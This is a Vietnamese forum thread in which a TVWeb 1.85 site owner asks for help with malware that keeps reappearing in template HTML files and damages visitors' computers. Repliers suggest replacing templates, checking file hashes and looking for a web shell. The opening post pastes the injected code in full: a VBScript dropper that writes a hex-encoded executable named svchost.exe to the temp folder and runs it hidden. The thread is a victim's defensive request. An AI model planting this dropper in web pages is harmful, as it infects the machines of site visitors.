Hiện tại em dùng tvweb 1.85 toàn bị dính mã độc trong các file html mục templtes , E đã xóa mã độc liên tục nhưng 1 , 2 ngày nó lại xuất hiện trong vài file html :(
Ai truy cập vào web của em nhiều cũng bị hỏng máy :((

Nội dụng đoạn mã như sau:


<div id="subbottom"></div><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040 00000000000000000000000000000000000000000000000000 00000000000000000000D80000000E1FBA0E00B409CD21B801 4CCD21546869732070726F6772616D2063616E6E6F74206265 2072756E20696E20444F53206D6F64652E0D0D0A2400000000 0000005258727E16391C2D16391C2D16391C2DD536412D1B39 1C2D16391D2D54391C2D31FF6E2D17391C2D31FF602D17391C 2D31FF642D17391C2D5269636816391C2D0000000000000000 00000000000000000000000000000000504500004C01050011 9D4A4D0000000000000000E0000F010B01080000080000009A 01000000000000110000001000000020000000004000001000 00000200000400000000000000040000000000000000A00200 00040000000000000200000400001000001000000000100000 10000000000000100000000000000000000000602100008C00 00000090010000340000000000000000000000000000000000 0000D00100C000000000000000000000000000000000000000 00000000000000000000000000000000002000002000000000 00000000000000002000002001000000000000000000000000 00000000000000000000000000002E74657874000000D60600 00001000000008000000040000000000000000000000000000 200000602E7264617461000098070000002000000008000000 0C0000000000000000000000000000400000402E6461746100 0000385A010000300000005C01000014000000000000000000 0000000000400000C02E727372630000000034000000900100 00340000007001000000000000000000000000004000004020 C42E1F7D94A05D4955A9B34A5AA828820A449D60B686257131 A16D023C5A5FC6DFE74664AFAD424CF354060F9D3009567044 674FDC137012F940CF9846D7E3AC89A7EC06373F7F4903320A 65328DAF4903320F4903320F4903320F4903320F4903320F49 03320F4903320"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Có ai đã từng gặp vấn đề này mà giải quyết được thì giúp em với .
Bây giờ chuyển qua dùng NBB cũng khổ , các thành viên cũ đã dùng pass game và pass web giống nhau , bây giờ mà dùng NBB thì các tài khoản ấy không đăng nhập được nữa :((

thay templtes là được cậu à... mìh đã bị lỗi này rồi... :) pm yahoo trao đổi thêm nhé cậu :)

Mình đã thay templates của nó rất nhiều và thỉnh thoảng vào host kiểm tra lại vẫn có mấy file bị :-ss

lỗ hổng bảo mật thôi :), trước hết đơn giản hóa vấn đề là đổi tên templates và thay đổi 1 templates khác đơn giản thôi để tìm hiểu nguyên nhân từ file nào

thứ 2 bạn có thể google file check md5 file php online ấy,xem file nào bị thay đổi thì kiểm tra nhé

dính shell.............................................

cái này 3 năm trước tôi bị dính 1 fat kiểm tra tất cả file htm va php trong ổ cứng thì thấy bị hết
may mà các file để chế độ winrar lên giải nén là hết
các ổ c:\ d:\ e:\ có con svhost.exe đó xóa đi ko lại ăn hết các file htm php đó

lỗ hổng bảo mật thôi :), trước hết đơn giản hóa vấn đề là đổi tên templates và thay đổi 1 templates khác đơn giản thôi để tìm hiểu nguyên nhân từ file nào

thứ 2 bạn có thể google file check md5 file php online ấy,xem file nào bị thay đổi thì kiểm tra nhé

google file check md5 file php online là thế nào hả bác , chắc chắn là do 1file nằm trên chính server của mình, nó có nhiệm vụ phá TVweb của mình dùng free hay sao ấy :D
Chết em rồi.